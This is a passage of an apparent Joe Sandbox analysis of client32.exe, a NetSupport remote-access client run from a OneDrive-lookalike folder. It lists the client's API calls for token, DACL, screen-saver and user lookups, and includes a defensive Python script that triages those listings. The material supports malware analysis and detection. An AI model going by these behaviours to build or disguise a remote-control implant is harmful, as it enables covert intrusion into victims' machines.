                                                          • Part of subcall function 110E2B90: _malloc.LIBCMT ref: 110E2C73
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: wsprintf$Time_malloc$EnumFileInfoOpenQuerySystem
                                                        • String ID: %02d/%02d/%02d %02d:%02d:%02d.%03d$%s\%s$Accel=restored$Acceleration$DirectSound$DirectSound\Device Presence$DirectSound\Mixer Defaults$Error. Can't open %s$IsA()$Software\NSL\Saved\DS$WDM$Warning. DSReg e=%d, e2=%d$accel=%d, wdm=%d, key=%s, mix=%s, dev=%s$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h$set %s=15, e=%d
                                                        • API String ID: 2153351953-2541246523
                                                        • Opcode ID: ea49658e0559d7249552271ef26cbc16e8dfc3201216cf4df3aa1f849712d45b
                                                        • Instruction ID: 211f1d13b54fd8d85df03bceff53a25590f38c713c6c8c7458dc0526dc1957da
                                                        • Opcode Fuzzy Hash: ea49658e0559d7249552271ef26cbc16e8dfc3201216cf4df3aa1f849712d45b
                                                        • Instruction Fuzzy Hash: 5CB16F75D0162AAFDB21EB51CD88FEEB778AF44748F4041D9E909A2181EB706F84CF61
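The "APIs" listings on this page print every call with raw hex arguments, so the reader decodes the constants by hand: 0x11 passed to SystemParametersInfoA is SPI_SETSCREENSAVEACTIVE (uiParam 0 switches the screen saver off, 1 back on), 0x4A passed to SendMessageTimeoutA is WM_COPYDATA with flags 2 = SMTO_ABORTIFHUNG and a 0x2710 = 10000 ms timeout, 0x4 passed to Get/SetUserObjectSecurity is DACL_SECURITY_INFORMATION, and 0x80000002 with 0x20019 in the RegOpenKeyExA frame are HKEY_LOCAL_MACHINE and KEY_READ. The script below is an added example, not Joe Sandbox code and not code from the sample: it parses listing lines in the format used on this page, decodes the arguments against those Windows SDK constants and applies a handful of rules of its own choosing (screen saver toggled, WM_COPYDATA to another window, window station/desktop DACL rewritten, registry key opened, API resolved at run time). The sample listing inside it is copied from the function records above, with several functions merged into one input for brevity; `Call`, `parse_trace` and `triage` are this example's own names.

```python
"""Triage the per-function "APIs" listings of this report.
Added example: not Joe Sandbox code and not code from the analysed sample. It parses
"• Api.MODULE(args), ref: address" lines, decodes hex arguments against Win32 constants
(values from the Windows SDK headers) and applies a few rules of this example's own choosing.
The sample listing is copied from this page; several functions are merged into one input,
so on a real report run triage() on one function listing at a time."""
import re
from dataclasses import dataclass

API_LINE = re.compile(r"•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
                      r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)")
HEX_ARG = re.compile(r"(-?)([0-9A-F]{8})")
SPI_SETSCREENSAVEACTIVE, WM_COPYDATA, SMTO_ABORTIFHUNG = 0x0011, 0x004A, 0x0002   # winuser.h
DACL_SECURITY_INFORMATION, KEY_READ = 0x00000004, 0x00020019                    # winnt.h
HKEY_LOCAL_MACHINE = 0x80000002                                                 # winreg.h

@dataclass
class Call:
    api: str
    args: list      # int for hex values, str for literals, None for "?"
    ref: int        # call-site address
    subcall: bool   # listed as "Part of subcall function"

def parse_arg(token):
    token = token.strip()
    if token == "?":
        return None
    m = HEX_ARG.fullmatch(token)
    if m:   # "-00000001" is how the report prints 0xFFFFFFFF
        value = int(m.group(2), 16)
        return (-value) & 0xFFFFFFFF if m.group(1) else value
    return token

def parse_trace(text):
    calls = []
    for line in text.splitlines():
        m = API_LINE.search(line)
        if m:
            raw = m.group("args")
            args = [parse_arg(t) for t in raw.split(",")] if raw else []
            calls.append(Call(m.group("api"), args, int(m.group("ref"), 16), m.group("sub") is not None))
    return calls

def rule_screensaver(calls):
    for c in calls:
        if c.api.startswith("SystemParametersInfo") and len(c.args) >= 2 and c.args[0] == SPI_SETSCREENSAVEACTIVE:
            yield c.ref, f"screen saver {'disabled' if c.args[1] == 0 else 're-enabled'} via SPI_SETSCREENSAVEACTIVE"

def rule_copydata(calls):
    for c in calls:
        if (c.api.startswith("SendMessageTimeout") and len(c.args) >= 6
                and c.args[1] == WM_COPYDATA and isinstance(c.args[4], int)):
            flags = "SMTO_ABORTIFHUNG" if c.args[4] & SMTO_ABORTIFHUNG else hex(c.args[4])
            yield c.ref, f"WM_COPYDATA sent to another window ({flags}, timeout {c.args[5]} ms)"

def rule_user_object_dacl(calls):
    # read the object's SD, build a fresh SD carrying a DACL, write it back: the usual way
    # to open a window station or desktop to a process running under another account
    seen = {c.api for c in calls if not c.subcall}
    if {"GetUserObjectSecurity", "SetSecurityDescriptorDacl", "SetUserObjectSecurity"} <= seen:
        for c in calls:
            if (c.api == "SetUserObjectSecurity" and len(c.args) >= 2
                    and isinstance(c.args[1], int) and c.args[1] & DACL_SECURITY_INFORMATION):
                yield c.ref, "DACL rewritten on a window station/desktop handle (DACL_SECURITY_INFORMATION)"

def rule_registry(calls):
    for c in calls:
        if c.api.startswith("RegOpenKeyEx"):
            hive = "HKLM\\" if HKEY_LOCAL_MACHINE in c.args else ""
            access = " (KEY_READ)" if KEY_READ in c.args else ""
            for a in c.args:
                if isinstance(a, str) and "\\" in a:
                    yield c.ref, f"registry key opened: {hive}{a}{access}"

def rule_dynamic_resolution(calls):
    for c in calls:
        if c.api == "GetProcAddress" and len(c.args) >= 2 and isinstance(c.args[1], str):
            yield c.ref, f"API resolved at runtime: {c.args[1]}"

RULES = (rule_screensaver, rule_copydata, rule_user_object_dacl, rule_registry, rule_dynamic_resolution)

def triage(listing):
    calls = parse_trace(listing)
    return sorted(finding for rule in RULES for finding in rule(calls))

# Sample input copied from the "APIs" listings of this report (several functions merged).
SAMPLE_LISTING = r"""
• LoadLibraryA.KERNEL32(Kernel32.dll,82E0FB89), ref: 110B728D
• GetProcAddress.KERNEL32(00000000,SetThreadExecutionState), ref: 110B72DA
• SystemParametersInfoA.USER32(00000011,00000000,00000000,00000000), ref: 110B7318
• OleUninitialize.OLE32 ref: 110B7507
• SystemParametersInfoA.USER32(00000011,00000001,00000000,00000000), ref: 110B7544
• GetUserObjectSecurity.USER32(?,00000004,110855CC,?,?), ref: 11085247
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,?), ref: 11085379
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 110853B5
• SendMessageTimeoutA.USER32(?,0000004A,0001042A,?,00000002,00002710,00000000), ref: 1104D9EA
  • Part of subcall function 110E2140: RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,00000000,00000001,00000000,?,1102EA96,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110E215C
"""
```

`triage(SAMPLE_LISTING)` returns six findings keyed by call-site address, e.g. 0x110B7318 "screen saver disabled via SPI_SETSCREENSAVEACTIVE" and 0x110E215C "registry key opened: HKLM\SOFTWARE\Policies\NetSupport\Client\standard (KEY_READ)". On a real report feed one function listing at a time: the DACL rule looks for the read/build/write sequence inside a single function, and merging listings as the sample does would let unrelated calls satisfy it. Subcall lines carry the caller's stack beyond the documented parameters (the RegOpenKeyExA frame above is an example), which is why the registry rule scans all captured values for the hive and access constants rather than trusting fixed argument positions.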
                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 11133298
                                                        • RaiseException.KERNEL32(80000003,00000000,00000000,00000000), ref: 111332E5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CountExceptionRaiseTick
                                                        • String ID: %d.$C:\Users\user\AppData\Local\MSOneDrive\client32.exe$Support\$_%04d_%02d_%02d_%02d%02d%02d.dmp
                                                        • API String ID: 473833368-2752259210
                                                        • Opcode ID: eb20b46de86263ce3c0fc2cb08518a1f7edc3ee7639162ab589458b7dc855a32
                                                        • Instruction ID: b1318081cbd1093ae19426a44e825ea54fb6d23b40abf42cfb15725aaffc0af2
                                                        • Opcode Fuzzy Hash: eb20b46de86263ce3c0fc2cb08518a1f7edc3ee7639162ab589458b7dc855a32
                                                        • Instruction Fuzzy Hash: 1EA11871918659AFDB22CF24CC44BDAF7F4BB88715F108298E959A73C4EB309A44CB94
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(netapi32.dll,?,?), ref: 11135815
                                                        • GetProcAddress.KERNEL32(00000000,NetWkstaUserGetInfo), ref: 11135846
                                                        • GetProcAddress.KERNEL32(00000000,NetUserGetInfo), ref: 11135854
                                                        • GetProcAddress.KERNEL32(00000000,NetApiBufferFree), ref: 11135862
                                                        • GetUserNameW.ADVAPI32(?,?), ref: 111358B3
                                                        • GetTickCount.KERNEL32 ref: 11135920
                                                        • GetTickCount.KERNEL32 ref: 11135943
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressProc$CountTick$LibraryLoadNameUser
                                                        • String ID: <not Available>$AccessDenied$InvalidComputer$NetApiBufferFree$NetUserGetInfo$NetUserGetInfo(%ls\%ls) took %d ms and ret x%x$NetWkstaUserGetInfo$UserNotFound$d$netapi32.dll
                                                        • API String ID: 132346978-2450594007
                                                        • Opcode ID: 24e3902290bdfb9d156e41673af9ed8a99b6ed7f6cf7d5ae5b40d77d50fcf9c2
                                                        • Instruction ID: 59b0643e97b9a631c3f20454355d2f3f74fc8d6a298a7c9c16ab6adfcb60d694
                                                        • Opcode Fuzzy Hash: 24e3902290bdfb9d156e41673af9ed8a99b6ed7f6cf7d5ae5b40d77d50fcf9c2
                                                        • Instruction Fuzzy Hash: 89917975A152289FDB60CF28C894ADAFBB4EF89725F0180E9E94D97355D7309E80CF90
                                                        APIs
                                                        • BeginPaint.USER32(?,?), ref: 1101B20C
                                                        • GetClientRect.USER32(00000000,?), ref: 1101B23A
                                                        • CreateSolidBrush.GDI32(?), ref: 1101B244
                                                        • FillRect.USER32(?,?,00000000), ref: 1101B258
                                                        • GetStockObject.GDI32(00000011), ref: 1101B269
                                                        • SelectObject.GDI32(?,00000000), ref: 1101B27A
                                                        • DrawTextA.USER32(?,00000000,000000FF,?,00000001), ref: 1101B2A3
                                                        • SelectObject.GDI32(?,00000000), ref: 1101B2AE
                                                        • DeleteObject.GDI32(?), ref: 1101B3AC
                                                        • EndPaint.USER32(?,?), ref: 1101B3BA
                                                          • Part of subcall function 1114D430: SetWindowLongA.USER32(?,000000FC,?), ref: 1114D476
                                                          • Part of subcall function 1114D430: RemovePropA.USER32(?), ref: 1114D495
                                                          • Part of subcall function 1114D430: RemovePropA.USER32(?), ref: 1114D4A4
                                                          • Part of subcall function 1114D430: RemovePropA.USER32(?,00000000), ref: 1114D4B3
                                                        Strings
                                                        • NSMBmpClass WM_PAINT rcNew L=%d, T=%d, R=%d, B=%d, W=%d, H=%d, xrefs: 1101B31C
                                                        • e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 1101B220
                                                        • picholder w=%d, h=%d, xrefs: 1101B339
                                                        • m_hWnd, xrefs: 1101B225
                                                        • NSMBmpClass WM_PAINT rcClt L=%d, T=%d, R=%d, B=%d, W=%d, H=%d, xrefs: 1101B2F7
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Object$PropRemove$PaintRectSelect$BeginBrushClientCreateDeleteDrawFillLongSolidStockTextWindow
                                                        • String ID: NSMBmpClass WM_PAINT rcClt L=%d, T=%d, R=%d, B=%d, W=%d, H=%d$NSMBmpClass WM_PAINT rcNew L=%d, T=%d, R=%d, B=%d, W=%d, H=%d$e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd$picholder w=%d, h=%d
                                                        • API String ID: 3417689559-267201724
                                                        • Opcode ID: 0f0fde7be0d9a163d168c234d32f8707ec11b46134b45822327dab59a907cea7
                                                        • Instruction ID: 4dbc0ed789370292590261d06177d4a80673600d05af41177adcb8a0809f0c2d
                                                        • Opcode Fuzzy Hash: 0f0fde7be0d9a163d168c234d32f8707ec11b46134b45822327dab59a907cea7
                                                        • Instruction Fuzzy Hash: 03611BB6E00619AFCB04CFA8CD84DEEF7B9FB88714F108559E915A7244EB74AD04CB61
                                                        APIs
                                                        • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000001,00000000), ref: 1101B3FE
                                                        • CloseHandle.KERNEL32(00000000), ref: 1101B42E
                                                        • LoadLibraryA.KERNEL32(PCIImage.dll), ref: 1101B450
                                                        • CloseHandle.KERNEL32(00000000), ref: 1101B472
                                                        • GetProcAddress.KERNEL32(00000000,DecompressPNGToBitmap), ref: 1101B489
                                                        • FreeLibrary.KERNEL32(00000000), ref: 1101B4A1
                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 1101B4AA
                                                        • GlobalAlloc.KERNEL32(00000042,00000000), ref: 1101B4B5
                                                        • GlobalLock.KERNEL32(00000000), ref: 1101B4BE
                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 1101B4CD
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 1101B4D4
                                                        • CloseHandle.KERNEL32(00000000), ref: 1101B4DB
                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 1101B4EF
                                                        • OleLoadPicture.OLEAUT32(00000000,00000000,00000000,111AC60C,-0000001C), ref: 1101B513
                                                        • DeleteObject.GDI32(00000000), ref: 1101B53B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Global$CloseFileHandle$CreateLibraryLoad$AddressAllocDeleteFreeLockObjectPictureProcReadSizeStreamUnlock
                                                        • String ID: DecompressPNGToBitmap$PCIImage.dll
                                                        • API String ID: 2291646601-2375843702
                                                        • Opcode ID: cc2f3a6f886d93ff8ea9a700d807c02b635d1048fb06df1f0aa03edf9b03c29d
                                                        • Instruction ID: 62cfc7fa3e2055ec9800540563fbb578b27e0b4a6d2d587e1a7a746e2869ae39
                                                        • Opcode Fuzzy Hash: cc2f3a6f886d93ff8ea9a700d807c02b635d1048fb06df1f0aa03edf9b03c29d
                                                        • Instruction Fuzzy Hash: F351C076B40214AFE711EBA5DC88F9EBBACEB85724F04C165F906DB284DB74D901C7A0
                                                        APIs
                                                        • SystemParametersInfoA.USER32(00000010,00000000,111DC1A0,00000000), ref: 1112B2C2
                                                        • SystemParametersInfoA.USER32(00000011,00000000,00000000,00000000), ref: 1112B2D5
                                                        • SHGetFolderPathA.SHFOLDER(00000000,00000010,00000000,00000000,00000000), ref: 1112B46D
                                                        • GetWindowsDirectoryA.KERNEL32(00000000,00000104), ref: 1112B483
                                                        • CloseHandle.KERNEL32(00000000), ref: 1112B4CB
                                                          • Part of subcall function 11059580: __wcstoi64.LIBCMT ref: 110595BD
                                                        • SystemParametersInfoA.USER32(00000011,00000001,00000000,00000000), ref: 1112B613
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: InfoParametersSystem$CloseDirectoryFolderHandlePathWindows__wcstoi64
                                                        • String ID: Client$PrefixName$RecordAudio$ReplayFiles$ReplayPath$Show$ShowRecord$ShowToWindow$UI: End Show$UI: Start Show$\Desktop
                                                        • API String ID: 3054845645-718119679
                                                        • Opcode ID: 1df17266715f8f6575590b0a9cae3b1e463cd38446d3aa05f64ad84cc8b593d1
                                                        • Instruction ID: 4a8e56dd47aa2ec122ad2e2a6e1493817fcda6923c0d3750c0c878d0569fa937
                                                        • Opcode Fuzzy Hash: 1df17266715f8f6575590b0a9cae3b1e463cd38446d3aa05f64ad84cc8b593d1
                                                        • Instruction Fuzzy Hash: B4B10874B41665BFEB14DB60CD85FDAF761BB44718F608128FE2A6B2C4DB706800CB99
                                                        APIs
                                                        • GetSysColor.USER32(00000004), ref: 110035F1
                                                          • Part of subcall function 111319C0: SetBkColor.GDI32(?,00000000), ref: 111319D4
                                                          • Part of subcall function 111319C0: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 111319E9
                                                          • Part of subcall function 111319C0: SetBkColor.GDI32(?,00000000), ref: 111319F1
                                                        • CreateSolidBrush.GDI32(00000000), ref: 11003605
                                                        • GetStockObject.GDI32(00000007), ref: 11003610
                                                        • SelectObject.GDI32(?,00000000), ref: 1100361B
                                                        • SelectObject.GDI32(?,?), ref: 1100362C
                                                        • GetSysColor.USER32(00000010), ref: 1100363C
                                                        • GetSysColor.USER32(00000010), ref: 11003653
                                                        • GetSysColor.USER32(00000014), ref: 1100366A
                                                        • GetSysColor.USER32(00000014), ref: 11003681
                                                        • GetSysColor.USER32(00000014), ref: 1100369E
                                                        • GetSysColor.USER32(00000014), ref: 110036B5
                                                        • GetSysColor.USER32(00000010), ref: 110036CC
                                                        • GetSysColor.USER32(00000010), ref: 110036E3
                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 11003700
                                                        • Rectangle.GDI32(?,?,00000001,?,?), ref: 1100371A
                                                        • SelectObject.GDI32(?,?), ref: 1100372E
                                                        • SelectObject.GDI32(?,?), ref: 11003738
                                                        • DeleteObject.GDI32(?), ref: 1100373E
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Color$Object$Select$BrushCreateDeleteInflateRectRectangleSolidStockText
                                                        • String ID:
                                                        • API String ID: 3698065672-0
                                                        • Opcode ID: 04c01b13460c93f31d2d2e389f35455b7ffd5bfe07828e99ddf090b4159d3ad7
                                                        • Instruction ID: 2bc938ab10bd54deed445a78db49907ee5b49920563a61e7829f7d323b0f7c60
                                                        • Opcode Fuzzy Hash: 04c01b13460c93f31d2d2e389f35455b7ffd5bfe07828e99ddf090b4159d3ad7
                                                        • Instruction Fuzzy Hash: A7514EB6900609AFD710DFA5CC85EBFF3BCEF98705F104A18EA1297285D670B9058BA1
                                                        APIs
                                                        • GetTokenInformation.ADVAPI32 ref: 1108D831
                                                        • GetLastError.KERNEL32 ref: 1108D83B
                                                        • GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 1108D859
                                                        • _malloc.LIBCMT ref: 1108D862
                                                        • GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,?,00000000,00000000,00000000), ref: 1108D87C
                                                        • LookupAccountSidA.ADVAPI32(00000000,00000000,?,?,00000000,?,?), ref: 1108D8CA
                                                        • GetSidIdentifierAuthority.ADVAPI32(00000000), ref: 1108D8E3
                                                        • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 1108D8EA
                                                        • GetSidSubAuthority.ADVAPI32(00000000,00000000), ref: 1108D8F3
                                                        • GetTokenInformation.ADVAPI32(00000000,00000002,?,00002000,00000000), ref: 1108D931
                                                        • _malloc.LIBCMT ref: 1108D956
                                                        • GetTokenInformation.ADVAPI32(00000000,00000002,00000000,00001000,?), ref: 1108D974
                                                        • _free.LIBCMT ref: 1108DA92
                                                        • _free.LIBCMT ref: 1108DAA1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
